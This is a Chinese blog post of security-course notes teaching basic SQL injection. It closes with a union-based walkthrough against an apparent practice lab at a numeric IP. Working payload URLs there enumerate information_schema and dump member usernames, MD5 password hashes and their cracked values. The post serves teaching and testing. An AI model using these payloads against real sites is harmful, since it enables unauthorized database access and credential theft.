WEB漏洞-SQL注入之简要SQL注入

最新推荐文章于 2024-08-19 20:48:55 发布
最新推荐文章于 2024-08-19 20:48:55 发布
阅读量721 收藏 13
点赞数 6
分类专栏: Web 文章标签: 前端 sql android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SXXYNHHXX/article/details/141299990
版权

SQL注入漏洞是是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。


#SQL注入安全测试中危害

分为两类:危害数据库里的数据、直接危害到网站的权限(需要满足条件)

#SQL注入产生原理详细分析

见案例

SQL语句在定义的时候没有变量,就不能进行SQL注入

可控变量,带入数据库查询,变量为存在过滤或过滤不严谨

#可能存在注入的编号选项有哪几个?

www.xiaodi8.com/index.php?id=8

www.xiaodi8.com/?id=10

www.xiaodi8.com/?id=10&x=1

www.xiaodi8.com/index.php(post注入)

#参数有x注入,一下哪个注入测试正确? b、c

a.www.xiaodi8.com/new/php?y=1 and 1=1&x=2

b.www.xiaodi8.com/new/php?y=1&x=2 and 1=1

c.www.xiaodi8.com/new/php?y=1 and 1=1&x=2 and 1=1

d.www.xiaodi8.com/new/php?xx=1 and 1=1&xxx=2 and 1=1

#如果参数id存在注入点

http://www/cnhgs.net/main.php?id53(注入点)&page=1

- > http://www/cnhgs.net/main.php?page=1&id53(注入点)

必要知识点:

1.在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。

2.数据库中符号"."代表下一级,如xiaodi.user表示xiaodi数据库下的user表名。

information_schema.tables:记录所有表名信息的表

information_schema.columns:记录所有列名信息的表

table_name:表名

column_name:列名

table_schema:数据库名

如何判断注入点?

老办法:

and 1=1 页面正常

and 1=2 页面错误

可能存在注入点

SELECT * FROM users WHERE id=1 and 1=1 LIMIT 0,1 正常

SELECT * FROM users WHERE id=1 and 1=2 LIMIT 0,1 错误

逻辑运算符

或 且 非

or and xor

真 且 真 = 真

真 且 假 = 假

真 或 假 = 真

SELECT * FROM users WHERE id=1 真

1=1 真

1=2 假

真且真=真

真且假=假

SELECT * FROM users WHERE id=1 or 1=1 LIMIT 0,1 正常

SELECT * FROM users WHERE id=1 or 1=2 LIMIT 0,1 正常

不能用or判断

要选用最舒服的方法测试:

SELECT * FROM users WHERE id=1asdsadsad(随便输入) LIMIT 0,1

随便输入后对网页有影响说明带入数据库进行查询有注入点,没有影响说明没有带入数据库查询,出现404错误说明对输入检测没有漏洞

#猜解列名数量(字段数)

order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错

http://219.153.49.228:43230/new_list.php?id=1 order by 4

#报错猜解准备

http://219.153.49.228:43230/new_list.php?id=1 union select 1,2,3,4

http://219.153.49.228:43230/new_list.php?id=-1%20union%20%20select%201,2,3,4

http://219.153.49.228:43230/new_list.php?id=1%20and%201=22222%20union%20%20select%201,2,3,4

#信息收集

数据库版本:version() 5.7.22-0ubuntu0.16.04.1

数据库名字:database() mozhe_Discuz_StormGroup

数据库用户:user() root@localhost

操作系统:@@version_compile_os Linux

http://219.153.49.228:43230/new_list.php?id=-1%20union%20select%201,database(),version(),4

http://219.153.49.228:43230/new_list.php?id=-1%20union%20select%201,user(),@@version_compile_os,4

#查询指定数据库名mozhe_Discuz_StormGroup下的表名信息:

http://219.153.49.228:43230/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’

查询所有:

http://219.153.49.228:43230/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’

#查询指定表名StormGroup_member下的列名信息

http://219.153.49.228:43230/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘StormGroup_member’

id,name,password,status

#查询指定数据

http://219.153.49.228:43230/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member

#猜解多个数据可以采用limit x,1 变动猜解

http://219.153.49.228:43230/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 0,1

mozhe

356f589a7df439f6f744ff19bb8092c0 MD5解密 dsan13

http://219.153.49.228:43230/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1

mozhe

a26f03bdd67bc4a815c2c30c6daf0ce3 MD5解密 959003

!https://cdn.nlark.com/yuque/0/2021/png/1272951/1621318387933-023cfd3a-1af4-46c6-9d65-12841332ef89.png?x-oss-process=image%2Fformat%2Cwebp%2Fresize%2Cw_1406%2Climit_0

案例

简易代码分析SQL注入原理

接收数据 -> 拼接数据 -> 数据进数据库执行 -> 展示结果

!https://cdn.nlark.com/yuque/0/2021/png/1272951/1621319532337-7397f786-49fe-471b-879e-c74232526d68.png?x-oss-process=image%2Fformat%2Cwebp%2Fresize%2Cw_1022%2Climit_0

通过参数传递到拼接好的SQL语句中,由于是拼接语句就可以将一些恶意的SQL语句拼接到上面,来实现恶意的SQL语句执行的效果

烬柒小云
关注
  • 6
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《小迪网络安全笔记》 第十二节:WEB漏洞-SQL注入简要SQL注入
小陈的博客
08-20 4732
前言 在本系列课程学习中,SQL注入漏洞将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。 注:左边的比右边的难,学习顺序为从右向左。 一、忍者安全测试系统使用说明 二、上述思维导图简要说明 操作系统:windows和linux对大小写敏感不同,如果查了操作系统可以避免这个问题。 数据库名:如果不知道数据库名查询的时候会有问题。
关于sql注入简要演示(入坑抛砖)
09-09
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能正确过滤或验证用户输入的数据时,允许攻击者插入恶意的SQL语句到应用程序的查询中。本文将通过一个简单的示例来解释SQL注入的工作原理和演示如何利用它。 ...
第12天:WEB漏洞-SQL注入简要SQL注入
cailme的博客
04-24 137
渗透测试day12
小迪渗透测试学习笔记(十二)WEB漏洞-SQL注入简要SQL注入
萧丶的博客
12-24 700
在本系列课程学习中,SQL注入漏洞将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。 mysql注入 sql注入靶场搭建(sqlilabs) 看第2关: 查看源代码,发现需要输入一个 id , 输入id,同时输出sql语句: 发现直接传入变量 id ,加入sql语句中执行,没有任何限制,这就可能实现插入恶意代码执行,获取敏感.
第12天-Web漏洞——SQL注入之简易sql注入
MCTSOG的博客
01-19 1252
SQL注入 SQL注入就是一种通过操作输入来修改后台SQL语句达到代码执行进行攻击目的的技术 sql注入产生原因 接收数据 拼接数据 数据库执行 结果展示— 四个步骤,过程中处理不当就可能会存在注入漏洞 sql注入漏洞,取决于过滤严谨与否,过滤严谨,基本不可能存在sql注入漏洞,反之,就可能存在! SQL注入的危害 1.危害数据库里的数据 2.直接危害网站的权限 SQL 注入知识结构 mysql数据库注入 mysql数据库 数据库A=网站A=数据库用户A 表名——> 列名 ——>
第12篇:WEB漏洞~SQL注入~简要SQL注入
廖一语山的博客
09-24 1389
目录前言正文 前言   在本系列课程学习中,SQL注入漏洞将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。 学习顺序:从右往左、从上往下 正文 忍者安全测试系统使用说明 #上述思维导图简要说明 #SQL注入安全测试中的危害 #SQL注入产生原理详细分析 可控变量,带入数据库查询,变量未存在过滤或过滤不严重 #搭建第一个SQL注入学习
WEB漏洞-SQL注入简要注入1
weixin_43094844的博客
12-17 510
标题WEB漏洞-SQL注入简要注入 思维导图
小迪安全学习笔记--第12天:web漏洞-SQL注入简要SQL注入
zr1213159840的博客
11-06 2955
课程链接 第12天:web漏洞-SQL注入简要SQL注入 在本系列课程学习中,SQL注入漏洞将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。 SQL注入安全测试中危害 SQL注入能够操作数据。有些可以获取权限,如getwebshell SQL注入产生原理详细分析 id接收到数据,然后再sql中进行了拼接,最后再result中进行了执
WEB漏洞SQL注入简要SQL注入
qq_61861243的博客
04-12 605
SQL直接去对数据库中的数据进行操作(查询,更新,删除)SQL注入不同注入点是有条件的(权限)
SQL注入漏洞演示源代码
01-16
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过在输入数据...
防范SQL注入的应用分析
04-16
由于各种Web服务器的漏洞与程序的非严密性,导致针对Web服务器的脚本攻击事件日益增多,其大多是通过ASP或PHP等脚本注入作为主要的攻击手段, Web站点迅速膨胀的今天,基于两者的SQL注入也慢慢成为目前攻击的主流...
论文研究-SQL注入攻击及防御方法研究 .pdf
08-19
SQL注入攻击指的是利用WEB应用中存在的漏洞,通过构造特殊的SQL语句,进而对应用的数据库或服务器进行攻击。这种攻击手法可以用来获取敏感信息,篡改数据,甚至控制服务器。一个成功的SQL注入攻击可能会使攻击者入侵...
前端字符串将其分割成长度为 32 的子字符串数组
人与人之间最小的差别是智商,最大的差别是坚持。
08-19 95
要实现这个需求,可以编写一个简单的 JavaScript 函数来处理字符串并将其分割成长度为 32 的子字符串数组。将字符串切割后,对list数据进行数据处理。
pywebview 入门
小小宾的博客
08-18 554
pywebview 是一个轻量级的 python 库,旨在简化桌面应用程序的开发。它利用系统的 WebView 组件,使得开发人员可以使用现代 Web 技术(HTML、CSS、JavaScript)来创建用户界面,同时使用 python 处理业务逻辑。pywebview 使得创建跨平台桌面应用程序变得更加简单和高效。
CORS error && 302 Found
zcxbd的博客
08-19 33
单点登录认证:访问A系统,在B系统登录认证此处代码为A系统。
web前端之html弹窗面板的popover新属性
软件毕设协助及软件开发、智慧电子模块、计算机科技、软件开发、硬件开发、程序员、写代码、工程师、互联网、物联网、技术栈、程序、编程、IT。
08-18 3633
web前端之html弹窗面板的popover新属性
SQL-约束篇
最新发布
Broken_x的博客
08-19 397
SQL约束是数据库设计中不可或缺的一部分,通过合理使用各种约束,可以确保数据的完整性和一致性。在实际应用中,开发者应根据需求灵活运用这些约束,以提高数据管理的效率和安全性。
微信小程序电话号码授权
qq_36022463的博客
08-16 625
文档:https://developers.weixin.qq.com/miniprogram/dev/OpenApiDoc/user-info/phone-number/getPhoneNumber.html。文档:https://developers.weixin.qq.com/miniprogram/dev/framework/open-ability/getPhoneNumber.html。掉这个获取电话号码,需要先获取access_token。获取token,有效期是两小时,需要缓存,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值